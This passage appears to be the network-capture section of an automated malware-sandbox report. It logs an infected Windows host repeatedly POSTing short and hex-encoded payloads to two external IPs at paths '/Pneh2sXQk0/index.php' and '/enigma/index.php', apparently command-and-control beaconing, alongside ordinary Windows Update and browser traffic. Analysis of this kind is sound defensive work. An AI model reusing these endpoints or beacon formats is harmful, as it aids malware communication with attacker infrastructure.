                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.203063011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1581192.168.2.551438193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.447899103 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.695905924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1582192.168.2.551439193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.535720110 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.779119968 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1583192.168.2.551440193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:13.943561077 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.189446926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1584192.168.2.551441193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.027424097 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.277661085 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1585192.168.2.551442193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.510479927 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.759174109 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1586192.168.2.551443193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.617121935 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:14.865086079 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1587192.168.2.551444193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:15.012197971 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:15.266007900 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1588192.168.2.551445193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:15.118655920 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:15.372178078 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.54970513.85.23.86443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:28:14 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                      2024-04-19 01:28:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                      MS-CorrelationId: b39d04e5-6196-4d38-b40e-824777f16803
                                                                                                                                                                                                                                      MS-RequestId: 9bbf82f9-f129-4af0-beb0-a1c7bab85e58
                                                                                                                                                                                                                                      MS-CV: 6e7UWksuU0CnpPv3.0
                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:28:14 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                                      2024-04-19 01:28:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                      2024-04-19 01:28:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.54971213.85.23.86443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:28:53 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                      2024-04-19 01:28:53 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                                                      MS-CorrelationId: 9bcbd3cc-de13-48cf-8002-f854d8109664
                                                                                                                                                                                                                                      MS-RequestId: 72147229-14ef-42ae-a6e1-c407b04c8331
                                                                                                                                                                                                                                      MS-CV: JkU2a/ndMECeVuo9.0
                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 25457
                                                                                                                                                                                                                                      2024-04-19 01:28:53 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                                                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                                                      2024-04-19 01:28:53 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                                                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.54972564.233.185.1364432956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:16 UTC810OUTGET /account HTTP/1.1
                                                                                                                                                                                                                                      Host: www.youtube.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:17 UTC2428INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:17 GMT
                                                                                                                                                                                                                                      Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
                                                                                                                                                                                                                                      Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
